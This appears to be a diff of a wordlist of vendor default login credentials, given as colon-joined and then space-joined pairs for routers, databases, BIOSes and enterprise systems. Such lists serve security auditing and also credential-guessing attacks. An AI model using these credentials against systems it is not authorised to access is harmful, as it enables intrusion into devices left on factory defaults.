-:isolation -:Q54arwms -PLEX:PLEX -OLAPDBA:OLAPDBA -:g6PJ -OLAPSVR:INSTANCE -user_expert:demo -root:pixmet2003 -Bhosda:Lund -TEST: -qsvr:ibmcel -CMSBATCH:CMSBATCH -:ABCD -gropher: -:AM -administrator:admin -:condo -:Toshiba -:familymacintosh -TAHITI:TAHITI -NEWINGRES:NEWINGRES -:AMI?SW -:mMmM -man:man -VM3812: -root:powerapp -ibm:service -VIF_DEVELOPER:VIF_DEV_PWD -ADMIN:WELCOME -Admin:Barricade -joeuser:joeuser -system:isp -IPC: -HELPDESK:HELPDESK -wlpisystem:wlpisystem -TSAFVM: -prtgadmin:prtgadmin -SYSTEM:CHANGE_ON_INSTALL -:CONCAT -:t0ch88 -webmaster:webmaster -:djonet -ADMIN:changeme -Any: -:Compaq -UAMIS_: -theman:changeit -CISINFO:CISINFO -mobile:dottie -QS_CB:QS_CB -CDEMORID:CDEMORID -tech:nician -DEMO2: 
-administrator:none -SYS:MANAG3R -End:User:7936 -PORTAL30_PUBLIC:PORTAL30_PUBLIC -sysadmin:nortel -SYS:D_SYSTPW -SYSTEM:SYSPASS -Guest:blank -User:User -MDDEMO_CLERK:CLERK -FIELD:FIELD -Admin:SECRET123 -Guest:Guest -PHANTOM: -admin:amigosw1 -:xmux -write: -ADMINISTRATOR:SENTINEL -system:field -:ducati900ss -qsecofr:22222222 -:lkw:peter -:awkward -:TzqF -SYSTEST_CLIG:SYSTEST_CLIG -ODS:ODS -admin:axis2 -BLAKE:PAPER -TSDEV:TSDEV -PRODBM: -admin:letmein -:joh316 -dos:dos -login:0000 -APL2PP: -system:hdms -admin:phplist -god1:12345 -admin:novell -CICSUSER:CISSUS -22222222:22222222 -root:passw0rd -user_publisher:demo -OSE$HTTP$ADMIN:(random:password) -def:trade -SuperUser:kronites -QS_CBADM:QS_CBADM -SYSA:SYSA -:00000000 -STUDENT:STUDENT -Draytek:1234 -SMDR:SECONDARY -EREP: -VSEMAN: -:OOOOOOOO -primos_cs:prime -demo: -fwadmin:xceladmin -:j64 -MTS_USER:MTS_PASSWORD -:AWARD_SW -AQDEMO:AQDEMO -private:ReadWrite:access:secret -:GWrv -:MagiMFP -:SnuFG5 -IS_$hostname:IS_$hostname -HPSupport:badg3r5 -ORASSO:ORASSO -GATEWAY: -:t0ch20x -CVIEW: -SH:SH -:zeosx -XXSESS_MGRYY:X#1833 -:wodj -:FOOBAR -SYSMAN:SYSMAN -VMMAP: -admin:urchin -PORTAL30_DEMO:PORTAL30_DEMO -Ezsetup: -QS_CS:QS_CS -administrator:PlsChgMe! 
-CMSUSER: -:MCUrv -DEMO1: -admin:adminadmin -userNotUsed:userNotU -:AMI~ -root:ibm -ncadmin:ncadmin -TESTPILOT:TESTPILOT -:Polrty -fg_sysadmin:password -UETP:UETP -QS:QS -DBI:MUMBLEFRATZ - :ILMI -SYSTEM:SYS -JWARD:AIROPLANE -APPS_MRC:APPS_MRC -:uboot -Moe:hello -SENTINEL:SENTINEL -admin:netgear1 -Yak:asd123 -PDP11:PDP11 -:aammii -Flo:hello -SLIDE:SLIDEPW -root:bagabu -primeos:primeos -:Spacve -:256256 -INFO:INFO -checkfsys:checkfsys -PRODCICS:PRODCICS -:foolproof -:AWARD_PW -MXAGENT:MXAGENT -SYSTEM:ORACLE8I -admin:no:password -VMTLIBR: -POWERCARTUSER:POWERCARTUSER -VMBACKUP: -CPNUC: -:QDI -:shiva -distrib:distrib0 -SUPERVISOR:SUPERVISOR -SYSMAINT:SERVICE -MIGRATE:MIGRATE -CDEMOUCB:CDEMOUCB -system:prime -QSRV:22222222 -:c -OLTSEP: -sysbin:sysbin -signa:signa -autocad:autocad -:SWITCHES_SW -WEBDB:WEBDB -daemon: -:aPAf -ncrm:ncrm -SAMPLE:SAMPLE -:1 -HCPARK:HCPARK -ALLINONE:ALLINONE -nm2user:nm2user -SAVSYS: -IIPS: -PATROL:PATROL -:technolgi -:MBIU0 -mailadmin:secret -adm:adm -TMSADM: -tutor:tutor -ESubscriber: -CHEY_ARCHSVR:CHEY_ARCHSVR -write:synnet -software:software -admin:welcome -god2:12345 -bbs:bbs -:Dell -disttech:disttech -FSFTASK2: -:zbaaaca -:prost -ORDSYS:ORDSYS -Administrator:administrator -:1234567890 -gopher:gopher -PSFMAINT: -SYSTEM:MANAG3R -:RM -:s!a@m#n$p%c -EAdmin: -12345:12345 -DECNET:DECNET -OPERATIONS:OPERATIONS -$system: -REP_OWNER:DEMO -PANAMA:PANAMA -LIBRARIAN:SHELVES -SYSTEM:0RACLE -fal: -4Dgifts:4Dgifts -:biosstar -NETSERVER:NETSERVER -:tiny -root:TANDBERG -POWERCHUTE:APC -USER5:USER5 -GPFD:GPFD -:12345678 -blank:admin -QS_OS:QS_OS -sysadm:admin -REPADMIN:REPADMIN -Administrator:12345678 -0:0 -DEMO8:DEMO8 -DEMO9:DEMO9 -CDEMO82:CDEMO82 -admin:boca:raton -Administrator:vision2 -administrator:0 -umountsys:umountsys -snmp:snmp -Username:PASSWORD -volition: -USER0:USER0 -CDEMOCOR:CDEMOCOR -SYSTEST:UETP -Rodopi:Rodopi -DECNET:NONPRIV -user_checker:demo -:tatercounter2000 -qserv:qserv -:ESSEX:or:IPC -AQ:AQ -support: -SAPR3:SAP -VRR1:VRR1 
-fastwire:fw -admi:admin -FINANCE:FINANCE -WinCCAdmin:2WSXcder -ESTOREUSER:ESTORE -fax:fax -VIRUSER:VIRUSER -LINK:LINK -APPLSYSPUB:FNDPUB -:BIOS -SYS:ORACLE8 -SYS:ORACLE9 -overseer:overseer -checksys:checksys -umountfs:umountfs -DBDCCICS:DBDCCIC -Admin:password -:x6zynd56 -TOAD:TOAD -root:mozart -ntpupdate:ntpupdate -root:router -MDDEMO_MGR:MGR -ARCHIVIST: -SUPERVISOR:HARRIS -:11111 -billy-bob: -lp:bin -DECMAIL:DECMAIL -alien:alien -admin:dnnadmin -nsroot:nsroot -AdvWebadmin:advcomm500349 -dvstation:dvst10n -SERVICECONSUMER1:SERVICECONSUMER1 -MMO2:MMO2 -qsecofr:11111111 -NOC:NOC -WWWUSER:WWWUSER -root::Serial:port:only: -SAP:SAPR3 -root:t0talc0ntr0l4! -NEVIEW: -MAIL: -ODSCOMMON:ODSCOMMON -fal:fal -pixadmin:pixadmin -ripeop: -PENG: -:BIOSPASS -netlink:netlink -L2LDEMO:L2LDEMO -OUTLN:OUTLN -12.x: -scott:tiger:or:tigger -:toshy99 -dbase:dbase -:nz0u4bbe -fam:fam -:bell9 -Oper:Oper -RMAIL:RMAIL -administrator:19750407 -FND:FND -admin:exinda -PRIV:PRIV -admin:barney -SETUP: -:biodata -:24Banc81 -news:news -VSEIPO: -:j09F -pw:pw -GUEST: -ilon:ilon -:award_? 
-SYS:0RACLE39 -SYS:0RACLE38 -DEFAULT:DEFAULT -:AMI!SW -PLSQL:SUPERSECRET -root:alpine -politcally:correct -18140815:18140815 -APPUSER:APPUSER -SUPERVISOR: -CENTRA:CENTRA -LBACSYS:LBACSYS -:alfarome -PDP8:PDP8 -SFCMI: -administrator:*:*:# -lpadm:lpadm -Test:Everything: -bewan:bewan -:2580 -DIP:DIP -:Sxyz -mfd:mfd -MDDEMO:MDDEMO -:intermec -:589589 -SWPRO:SWPRO -DES:DES -root:fibranne -Coco:hello -GCS: -rodopi:rodopi -:touchpwd= -Scott:Tiger -Admin5:4tugboat -admin:funkwerk -ANDY:SWORDFISH -DESQUETOP: -nobody: -Manager:657 -:mysweex -SYSTEM:SYSLIB -NETCON:NETCON -JONES:STEEL -author:author -MOESERV: -web:web -tech:User -PUBSUB1:PUBSUB1 -SYS:D_SYSPW -CATALOG:CATALOG -:IBM -:Guest -SQLUSER: -RE:RE -REPORTS_USER:OEM_TEMP -MFG:MFG -POST:POST -HPLASER:HPLASER -HR:HR -VIDEOUSER:VIDEO:USER -DBA:SQL -:CMOSPWD -guest1:guest -superuser:asante -SYSTEM:0RACLE38 -SYSTEM:0RACLE39 -AUTOLOG1: -dadmin:dadmin -AURORA$JIS$UTILITY$: -wlcsystem:wlcsystem -news: -CPRM: +admin admin + +admin + admin +admin password +admin 1234 +root +Administrator admin +admin epicrouter +sysadm sysadm + 1234 + password + access +root root +tech tech + smcadmin + 0 +Administrator +root pass + system +root admin + PASSWORD + Symbol +operator +guest guest +admin bintec +security security +guest +debug synnet +manager manager + adtran +admin motorola +service smile + cascade +admin 0 +!root +user password + BRIDGE +netman netman +super super +admin switch +admin setup +admin changeme +diag switch +operator operator +user user +user +Cisco Cisco +Manager Manager +DTA TJM +apc apc +tech + cisco +User +root 1234 +Admin + letmein +cablecom router +adm +wradmin trancell + ascend +manager friend + NetICs +root blender +netscreen netscreen + sysadm + SKY_FOX +sa + public + Master +setup setup +root default + laflaf +cmaker cmaker +enable +MICRO RSX +login admin + Posterie +write private +root attack +monitor monitor + private + xdfk9874t3 +netopia netopia + Col2ogro2 +admin microbusiness +op op +adminview OCS +op 
operator +admin secure +admin atlantis +sysadmin sysadmin +super 5777364 +echo echo +craft +adm cascade +admin default +maint maint +comcast 1234 +CSG SESAME +diag danger +readonly lucenttech2 +admin operator +Manager +debug d.e.b.u.g +admin hello + SYSTEM +root ascend +root calvin +manuf xxyyzz +cusadmin highspeed +admin 123 +smc smcadmin +admin Sharp +root password +sweex mysweex +disttech 4tas +su super +admin system +root changeme +poll tech +sysadmin password +SYSDBA masterkey +anonymous + 0000 +root permit +admin barricade +support support +root tslinux +admin hp.com +recovery recovery +USERID PASSW0RD +eng engineer +administrator administrator +admin pwp +admin isee +NETWORK NETWORK +JDE JDE +admin superuser +Guest + Super +admin admin123 +super surt +rwa rwa +admin 123456 +admin NetCache + ADTRAN +USER USER +test test +admin extendnet +admin ironport +lp lp + Cisco +administrator +admin 1111 +sysadmin PASS +ro ro +admin Ascend + _Cisco +MAIL MAIL +ami + sitecom +hsa hsadb +system password +MGR CAROLIAN +ADMINISTRATOR ADMINISTRATOR +admin sysAdmin +root tini +admin smcadmin + Helpdesk +FIELD SERVICE +PBX PBX +netman +HELLO FIELD.SUPPORT +system sys +hscroot abc123 +1502 1502 + star +superuser admin +HELLO MGR.SYS +sysadm anicust +Administrator Administrator +netrangr attack + Intel + 12345 +readwrite lucenttech1 + secret +piranha piranha +wlse wlsedb +admin cisco +l3 l3 +admin diamond +none admin +naadmin naadmin +public public +admin 1988 +admin radius +admin root +NETOP +Administrator letmein +HELLO MANAGER.SYS + raidzone + 3ascotel +MANAGER HPOFFICE +demo demo + 166816 +User Password +admin zoomadsl +D-Link D-Link +user public +user pass +l2 l2 +MGR CCC +rw rw +cgadmin cgadmin +storwatch specialist + secure +vcr NetVCR +OPERATOR COGNOS +piranha q +admin synnet +MDaemon MServer +root cms500 +root davox +jagadmin +enquiry enquirypw +at4400 at4400 +support h179350 +davox davox +admin asd +PFCUser 240653C9467E45 +setup changeme +superuser superuser + atc123 
+aaa +root admin_1 + 266344 +MGR WORD +topicalt password +admin2 changeme +1234 1234 +MANAGER ITF3000 + connect +FIELD HPONLY +nms nmspw +client client +admin comcomcom + speedxess +MGR ROBELLE + epicrouter +sys uplink +OPERATOR SYSTEM +field support +MGR SYS +root letacla + FORCE +deskman changeme +MAIL REMOTE +SYSADM sysadm +superadmin secret + backdoor +pmd +MGR CNAS +admin 22222 +GEN2 gen2 + medion +ADMN admn +Factory 56789 +PRODDTA PRODDTA +tellabs tellabs#1 +spcl 0 +dadmin dadmin01 + comcomcom +administrator password +helpdesk OCS +dhs3mt dhs3mt +MGR SECURITY +setup changeme! +install llatsni +adfexc adfexc +IntraSwitch Asante +manage !manage +superman 21241036 +MANAGER TELESUP +craft crftpw +login 0 + help +MGR HPOFFICE + lantronix +SPOOLMAN HPOFFICE +manager admin + netadmin +ADVMAIL HP +FIELD SUPPORT +MANAGER SYS +MGR VESOFT +vt100 public +PSEAdmin $secure$ +HELLO OP.OPERATOR +Manager friend + hs7mwxkk +patrol patrol + SUPER + SMDR + 1064 +teacher password +PCUSER SYS +MGR ITF3000 +Any 12345 +OPERATOR DISC +RSBCMON SYS +cellit cellit +MGR INTX3 +inads inads +halt tlah +root wyse +locate locatepw +admin visual +TMAR#HWMT8007079 +rapport r@p8p0r+ +MGR TELESUP +xbox xbox + TENmanUFactOryPOWER +device device +NICONEX NICONEX +admin admin1234 +root fivranne +acc acc +31994 31994 +admin netadmin +bcim bcimpw +websecadm changeme +blue bluepw +topicnorm password +supervisor PlsChgMe + R1QTPS +MGR HPONLY +ccrusr ccrusr +root Cisco +login password +266344 266344 +MAIL MPE +telecom telecom +MAIL HPOFFICE +GEN1 gen1 +Administrator smcadmin +SSA SSA + snmp-Trap +HTTP HTTP + default +mtch mtch +admin adslolitec +Administrator ganteng +bciim bciimpw +browse browsepw +Admin Admin + Password +hydrasna +sys change_on_install +deskres password +bbsd-client changeme2 +anonymous Exabyte +admin rmnetlm +replicator replicator +intel intel +OPERATOR SUPPORT +MGR HPP196 +radware radware +intermec intermec +mlusr mlusr +MGR RJE +FIELD LOTUS +init initpw +e250 e250changeme +MAIL 
TELESUP +Polycom SpIp +temp1 password + adminttd +tech field +support supportpw +mac + MiniAP +MANAGER SECURITY +3comcso RIP000 +RMUser1 password +WP HPOFFICE +Administrator changeme +MGR XLSERVER +MGR HPP187 +MGR HPP189 +inads indspw +admin linga +craft craft + enter +NAU NAU +rcust rcustpw +admin AitbISP4eCiG +mtcl mtcl +MGR CONV +topicres password +bcnas bcnaspw +MGR NETBASE +admin access +public +adminuser OCS +MGR REGO +Root +cac_admin cacadmin +mediator mediator +superman talent +Anonymous +kermit kermit +admin x-admin +MGR HPDESK + 9999 +root ROOT500 +admin my_DEMARC +volition volition +GlobalAdmin GlobalAdmin + 4getme2 +LUCENT01 UI-PSWD-01 +admin 2222 +LUCENT02 UI-PSWD-02 +MANAGER TCH +adminstat OCS +desknorm password +IntraStack Asante +OPERATOR SYS +MGR COGNOS + Fireport + ILMI +maint maintpw +supervisor supervisor +e500 e500changeme +admin mu +MANAGER COGNOS +deskalt password +admin OCS +bbsd-client NULL +cust custpw +admin noway +tiara tiaranet +bcms bcmspw + TANDBERG +m1122 m1122 +telco telco +superuser +xd xd +dhs3pms dhs3pms +VNC winterm +craft craftpw +maint rwmaint +anonymous any@ +login access +browse looker +customer none +cisco cisco +adminstrator changeme +FIELD MANAGER + 1234admin +FIELD MGR +ftp_nmc tuxalize +me +iclock timely +echo User +ADVMAIL HPOFFICE DATA +login 1111 +login 8429 +Administrator manage + Babylon +admin hagpolm1 +root 12345 +scmadmin scmchangeme +user tivonpw +sysadm Admin +Administrator password +admin administrator +installer installer +webadmin webadmin +ftp_inst pbxk1064 +DDIC 19920706 + pento +admin NetSurvibox +SYSTEM D_SYSTPW +draytek 1234 + 3477 +operator $chwarzepumpe +administrator asecret +EARLYWATCH SUPPORT + 10023 +Manager Admin +super.super +ftp_oper help1954 +corecess corecess +superuser 123456 +admin Password +super.super master +admin Protector +SYSTEM MANAGER +webadmin 1234 +install secret +FIELD HPWORD PUB +admin 12345 +admin symbol +weblogic weblogic +Admin 1988 +system/manager sys/change_on_install 
+root 3ep5w2u + 8111 + jannie +End User 123 +none 0 +d.e.b.u.g User +admin tomcat +target password +Administrator pilou +MD110 help +Administrator 3ware + ANYCOM +tiger tiger123 +adminttd adminttd +admin asante +admin smallbusiness +admin netscreen +FIELD HPP187 SYS +guest User +maint ntacdmax +admin w2402 +wlseuser wlsepassword +SAPCPIC admin +ftp_admi kilo1987 +admin articon +mtcl +default.password +admin michelangelo +manager changeme +root Mau'dib + Serial Num +root ggdaseuaimhrke +7 maintain +2 syslib +ADMIN admin +system weblogic +Administrator ggdaseuaimhrke +ADMIN +itsadmin init +PUBSUB PUBSUB +admin demo +system manager +sys sys +CTXSYS CTXSYS +ftp +bill bill +192.168.1.1 60020 @dsl_xilno +FIELD +admin dmr99 +setpriv system +GUEST GUEST +SAP* 06071992 +operator 1234 +t3admin Trintech +hello hello +supervisor +CISCO15 otbu+1 +1.79 Multi + babbit +mso w0rkplac3rul3s +Telecom Telecom +qsysopr qsysopr +admin TANDBERG +admin imss7.0 + nokia +APPS APPS +Developer isdev +mail mail +admin draadloos +qsecofr qsecofr +11111 x-admin + default.password +Service 5678 +enable cisco +netadmin nimdaten +Polycom 456 +admin P@55w0rd! 
+admin 1234admin +root par0t +any system +db2fenc1 db2fenc1 +johnson control +2 maintain +isp isp +demos +QSRV QSRV +root iDirect +MDSYS MDSYS +Admin 123456 +2 manager +vpasp vpasp +TEST TEST + Telecom +QSECOFR QSECOFR +adm none + 2501 +1 syslib +system security +admin leviton +!root blank +informix informix +root mpegvideo +5 games +root 0P3N +engmode hawk201 +scout scout +qpgmr qpgmr +admin admin000 +ADSL expert03 +cisco +images images +admin security +admin surecom +Gearguy Geardog + symantec +comcast +admin adslroot +1 manager +Demo + xyzzy +Administrator adaptec +system system +SAP* PASS +serial# serial# +BACKUP BACKUP +stratacom stratauser +root rootme +6.x +root !root +webadmin webibm + riverhead +mary password +COMPANY COMPANY +SYS SYS +DSL DSL +Jetform +none amber +eagle eagle +ROUTER +root brightmail +admin pass + HEWITT RAND +ods ods +siteadmin toplayer +admin OkiLAN +root rootpass +Alphanetworks wrgg15_di524 + x40rocks + nokai +Admin1 Admin1 +field field +Admin admin +Admin ImageFolio + iolan + manager +admin pfsense +janta sales janta211 +servlet manager +username password +citel password +Replicator iscopy +SYSMAN OEM_TEMP +1 operator +SYSTEM SYSTEM +administrator RSAAppliance +master themaster01 +Admin 1234 +2 operator +SUPERUSER ANS#150 +admin passwort +cn=orcladmin welcome +30 games +maintainer admin +setup + hello +admin NetSeq +BRIO_ADMIN BRIO_ADMIN + citel +internal oracle +CQSCHEMAUSER PASSWORD +root kn1TG7psLu +SYS SYSPASS + lkwpeter +DEV2000_DEMOS DEV2000_DEMOS +FSFTASK1 +checkfs checkfs +BACKUP +USER1 USER1 +root TENmanUFactOryPOWER +SQLDBA +root resumix +HELP HELP +toor logapp +SYS 0RACLE9 +SYS 0RACLE8 + 57gbzb +!root none +qsrvbas qsrvbas +SYSADMIN +EZsetup +Administrator 1234 + sldkj754 +BATCH +STRAT_USER STRAT_PASSWD +Administrator 19750407 + User +user USERP +primenet primeos +OEMREP OEMREP +admin [^_^] +USER6 USER6 +lynx + TTPTHA +powerdown powerdown +root Mau’dib +SYSTEM ORACL3 +$ALOC$ +password +VOL-0215 +admin nimda +tomcat tomcat 
+REP_MANAGER DEMO +WinCCConnect 2WSXcder +ALLIN1 ALLIN1 +DIRMAINT +eqadmin Serial port only equalizer +sysadm sysadmpw +QSRVBAS QSRVBAS +admin ip305Beheer +debug tech + ACCORD +AQJAVA AQJAVA +LASERWRITER LASERWRITER +Administrator 0000 +root nsi +PERFSTAT PERFSTAT +apcuser apc +MBWATCH MBWATCH + protection +system_admin +unix unix +OWNER OWNER +NETPRIV NETPRIV +VSEMAINT + AWARD?SW +DEMO DEMO +tomcat changethis +SYMPA SYMPA +REP_OWNER REP_OWNER +DCL DCL +FAX +root dbps +ARCHIVIST ARCHIVIST +USER PASSWORD +VTAMUSER +LASERWRITER +VMTAPE +basisk basisk +NetLinx password +OutOfBox demos guest 4DGifts (none by default) +none letmein +NETMGR NETMGR +DEFAULT USER +OAS_PUBLIC OAS_PUBLIC +read +AP AP +demos demos +SYSTEM Admin +admin j5Brn9 +MTSSYS MTSSYS +SYSMAINT DIGITAL +AUDIOUSER AUDIOUSER +Joe hello +IDMS + teX1 +admin allot +$SRV $SRV +snake +SYS 0RACLE +ADVMAIL +Administrator nicecti +ROOT ROOT +PRINTER PRINTER +shutdown +satan + m1link +RDM470 +master access + l2 + l1 +trouble trouble +fax +OP1 +admin@example.com admin +root trendimsa1.0 +HOST HOST +ADLDEMO ADLDEMO +QS_ADM QS_ADM +bin sys + AMI +OPER OPER +oracle +jj +PO7 PO7 +SYSTEM 0RACLE8 +SYSTEM 0RACLE9 +www +joe password + komprie + 123 +MAINT MAINT +CMSBATCH +root toor +CCC +role1 tomcat +DATAMOVE +lp + AMISETUP + sp99dd +halt halt +MSHOME MSHOME +ISPVM +crowd­-openid-­server password +user_editor demo +sedacm secacm +ROOT +Admin 3Com +db2admin db2admin +Airaya Airaya +supervisor visor +none Wireless +SYSDUMP1 +IMEDIA IMEDIA + Biostar +install install +primos_cs primos +admin infrant1 +Administrator Partner + Administrative +USER_TEMPLATE USER_TEMPLATE +pnadmin pnadmin + h6BB +lpadmin lpadmin +guest none +VTAM VTAM +TRACESVR TRACE +POSTMASTER POSTMASTER +MAILER MAILER +RSCSV2 +QS_WS QS_WS + sma +system_admin system_admin +circ +Demo password + rwa +nobody nobody +Tasman Tasmannet +admin !admin +DISCOVERER_ADMIN DISCOVERER_ADMIN +VMASMON +LR-ISDN LR-ISDN +TURBINE TURBINE +GL GL +PO PO + AMI_SW +super superpass 
+PRINT +MODTEST YES +GATEWAY GATEWAY +root system +PRIMARY PRIMARY +both tomcat + award.sw +haasadm lucy99 +pw pwpw +games games +DOCSIS_APP 3Com +bbs +EMP EMP +Admin cclfb +postmaster +SITEMINDER SITEMINDER +Any Any +vgnadmin vgnadmin +RJE RJE +gonzo +NEWS NEWS +sa Ektron + Award +AQUSER AQUSER +UTLBSTATU UTLESTAT + AMIAMI +netbotz netbotz +CTXSYS CHANGE_ON_INSTALL +xmi_demo sap123 + Crystal + Daewuu +ftp ftp +ORACACHE (random password) +MCUser MCUser1 +prash hello +sync +sysadm admpw +root rootadmin +PM PM +AP2SVP +master master +ibm 2222 +ULTIMATE ULTIMATE +SABRE +role1 role1 +user_pricer demo +admin enhydra +SUPERVISOR NF +EVENT EVENT + xyzall + rainbow +ADMIN JETSPEED +SYS ORACL3 +PORTAL30_SSO_PS PORTAL30_SSO_PS +FSFADMIN +OO OO +WKSYS WKSYS +OPERATNS OPERATNS + ksdjfg934t +UVPIM_ + merlin +OE OE +Any Local User Local User password +OCITEST OCITEST +web + HLT +ADMINISTRATOR admin +ESSEX + last +CTXSYS +None xyzzy +CTXDEMO CTXDEMO +user_designer demo + Admin + zebra +QDBA QDBA +role changethis +LRISDN LRISDN +tele tele +WEBCAL01 WEBCAL01 +rsadmin rsadmin +OMWB_EMULATION ORACLE +root alien +WINDOWS_PASSTHRU + sanfran +public ReadOnly access secret + AMIPSWD +MOREAU MOREAU +fast abd234 +root QNX +host dnnhost +administrator root +admin public +SYSTEM ORACLE + sertafu +ORDPLUGINS ORDPLUGINS +SYSWRM +mail + telos +ADMIN ADMIN +administrator adminpass +savelogs crash + ACCESS +SDOS_ICSAP SDOS_ICSAP +system adminpwd +BATCH BATCH +GUEST GUESTGUEST +SYSMAINT SYSMAINT +postmaster postmast +DSSYS DSSYS + award_ps + ZAAADA +MGWUSER MGWUSER + NTCIP +OPERATOR + hewlpack +TDOS_ICSAP TDOS_ICSAP +ssp ssp +EJSADMIN EJSADMIN + damin +INGRES INGRES +DS + A.M.I +estheralastruey + 1322222 +VCSRV VCSRV +Administrator storageserver +ssladmin ssladmin +CLARK CLOTH +shutdown shutdown +administrator 1234 +OEMADM OEMADM +restoreonly restoreonly1 +quser quser +PRINTER +MILLER MILLER +trmcnfg trmcnfg +REPORT REPORT +user_author demo + aLLy +dpn changeme +tour tour +mountfsys mountfsys 
+http +PROG PROG + iwill +openfiler password + Public +admin mp3mystic +RAID hpt +read synnet +admin peribit +STARTER STARTER +FAXUSER +GUEST GUESTGUE +DSA + guardone +daemon daemon +mountsys mountsys +SYSTEM ORACLE9 +SYSTEM ORACLE8 + gandalf +backuponly backuponly1 +IVPM1 + leaves +sysadm syspw +root blablabla + Compleri +USER3 USER3 +OPENSPIRIT OPENSPIRIT + spooml + changeit + wg +prime primeos +HPLASER + Vextrex +CSPUSER +qsvr qsvr +lynx lynx +SYSCKP +root letmein +Sysop Sysop +user_marketer demo +IMAGEUSER IMAGEUSER +root Password +bsxuser bsxpass +MASTER PASSWORD +USER9 USER9 +root ax400 +OLAPSYS MANAGER +SYSTEM OPERATOR +oracle oracle +root Mau?dib + MASTER +root t00lk1t +rsadmin + Daytec +OutOfBox + SZYX + cmaker + CTX_123 +rje rje +ODM_MTR MTRPW +QS_ES QS_ES +lansweeperuser mysecretpassword0* +DEMO3 +Username password +GPLD GPLD +uucp uucp +DBSNMP DBSNMP +VMARCH +GUEST TSEUG +SWUSER SWUSER +root 8RttoTriz +VTAM +OPERATNS +Operator Operator +CHEY_ARCHSVR +SYS ORACLE +roo honey +n.a guardone +accounting accounting +backuprestore backuprestore1 +PRINT PRINT + j322 + Craftr4 +dni dni +WEBADM password +iceman +guru *3noguru +FAX FAX +anon anon + j256 +USER8 USER8 +root honey +PORTAL30_SSO_PUBLIC PORTAL30_SSO_PUBLIC + 589721 +postgres +WINSABRE WINSABRE +USERP USERP +none public +Admin shs +SYS MANAGER +IVPM2 +PORTAL30_SSO PORTAL30_SSO +ALLIN1MAIL ALLIN1MAIL +POST +TEMP + xo11nE +admin nms +SYSADM SYSADM +BATCH1 +me me +SUPERVISOR NFI +PROMAIL +SECDEMO SECDEMO +ARAdmin AR#Admin# +sadmin +ORAREGSYS ORAREGSYS +VMASSYS +man +FROSTY SNOWMAN +LASER LASER +tutor + ?award +root changethis +DISKCNT +default WLAN_AP +SYSERR +WWW WWW +VAX VAX +none none + Cable-docsis +PROCAL +SUPERVISOR SYSTEM +FAXWORKS +ibm password +CTXSYS UNKNOWN +LDAP_Anonymous LdapPassword_1 +(any 3 chars) cascade +games +User 1234 + Zenith +setup/snmp setup/nopasswd +DSGATEWAY DSGATEWAY +AWARD_SW +CSMIG CSMIG + year2000 +umountfsys umountfsys + BIGO +root jstwo +VMS VMS +dni +bpel bpel +viewuser 
viewuser1 +admin ISPMODE +TDISK +politically correct +user_analyst demo +admin conexant +guest 1234 +root logapp +admin ip3000 +RSCS +COMPIERE COMPIERE +OSP22 OSP22 +guest1 guest1 +FORSE FORSE + lesarotl +factory factory +bubba (unknown) +admin ip20 +admin ip21 +LASER +QUSER QUSER + AWARD SW +primeos prime +admin tr650 +poll poll + j262 + xljlbj +glftpd glftpd + Advance +RMAN RMAN +mountfs mountfs +DIRECT + console +firstsite firstsite + SW_AWARD +IPFSERV + snake +Administrator Gateway +TSUSER TSUSER +BATCH2 +admin 123123 + 3098z + cc +snmp nopasswd +WebAdmin WebBoard +IBMUSER SYS1 +SMART +voadmin manager +BC4J BC4J +core phpreactor +OPERVAX OPERVAX +Bobo hello + Congress + central +WANGTEK WANGTEK +disttech etas +OWA OWA +USER2 USER2 +jasperadmin jasperadmin +FIELD DIGITAL +root uClinux +guest guestgue +FAXUSER FAXUSER +WINSABRE SABRE +VMBSYSAD +admin ip400 +PVM +ctb_admin sap123 + AMI.KEY + AMI.KEZ +  ANYCOM +USER_TEMPLATE +DEMO4 + inuvik49 +QSRV 11111111 +qsrv qsrv +superdba admin +PORTAL30 PORTAL31 +PORTAL30 PORTAL30 +XPRT XPRT +Crowd password +User 19750407 +18364 + zjaaadc +ilom-admin ilom-admin +rdc123 rdc123 +sysopr sysopr +tasman tasmannet +SYSTEM 0RACLE8I + Cisco router +admin store + SER +blank blank +ADMIN PASSWORD +admin IP address +WEBREAD WEBREAD +ODM ODM +11111111 11111111 +prime prime +AURORA$ORB$UNAUTHENTICATED INVALID +ADAMS WOOD +root vertex25 +sys bin +lp lineprin +Craft crftpw +www www +postgres dbpass +rfmngr $rfmngr$ +sync sync +WANGTEK + 1988 +MAINT +SYSTEST_CLIG SYSTEST +user user0000 +user_approver demo +ilom-operator ilom-operator +Nice-admin nicecti + HELGA-S +answer +NETNONPRIV NETNONPRIV +nuucp +CIDS CIDS +VASTEST +primenet primenet +redline redline + rw +spcl 0000 +admin muze +MBMANAGER MBMANAGER +webmaster +APPLSYS FND + ro +WINDOWS_PASSTHRU WINDOWS_PASSTHRU +USER4 USER4 +hqadmin hqadmin +UOMNI_ +FIELD TEST +sys system +Admin 123qwe +VMUTIL +POST BASE + dn_04rjc +uucpadm uucpadm +halt +FAXWORKS FAXWORKS +admin password1 +EXFSYS 
EXFSYS +4Dgifts +JMUSER JMUSER +admin imsa7.0 +SUPERVISOR NETFRAME +CIS CIS +UNITY_ + ciscofw +HLW HLW +admin brocade1 +pwrchute pwrchute + setup + Tiny +IDMSSE +postgres svcPASS83 +NSA nsa +!root !ishtar +admin blank +root NeXT +TELEDEMO TELEDEMO + AMIDECOD +recover recover +TRAVEL TRAVEL +lexar + efmukl +viewer +LIBRARY +admin raritan +PO8 PO8 +root@localhost root +NAMES NAMES +secofr secofr +PDMREMI + biostar +MGE VESOFT +USER7 USER7 +OWA_PUBLIC OWA_PUBLIC +questra questra +builtin builtin +SFCNTRL +SAP* 6071992 +boss boss +anonymous password + isolation + Q54arwms +PLEX PLEX +OLAPDBA OLAPDBA + g6PJ +OLAPSVR INSTANCE +user_expert demo +root pixmet2003 +Bhosda Lund +TEST +qsvr ibmcel +CMSBATCH CMSBATCH + ABCD +gropher + AM +administrator admin + condo + Toshiba + familymacintosh +TAHITI TAHITI +NEWINGRES NEWINGRES + AMI?SW + mMmM +man man +VM3812 +root powerapp +ibm service +VIF_DEVELOPER VIF_DEV_PWD +ADMIN WELCOME +Admin Barricade +joeuser joeuser +system isp +IPC +HELPDESK HELPDESK +wlpisystem wlpisystem +TSAFVM +prtgadmin prtgadmin +SYSTEM CHANGE_ON_INSTALL + CONCAT + t0ch88 +webmaster webmaster + djonet +ADMIN changeme +Any + Compaq +UAMIS_ +theman changeit +CISINFO CISINFO +mobile dottie +QS_CB QS_CB +CDEMORID CDEMORID +tech nician +DEMO2 +administrator none +SYS MANAG3R +End User 7936 +PORTAL30_PUBLIC PORTAL30_PUBLIC +sysadmin nortel +SYS D_SYSTPW 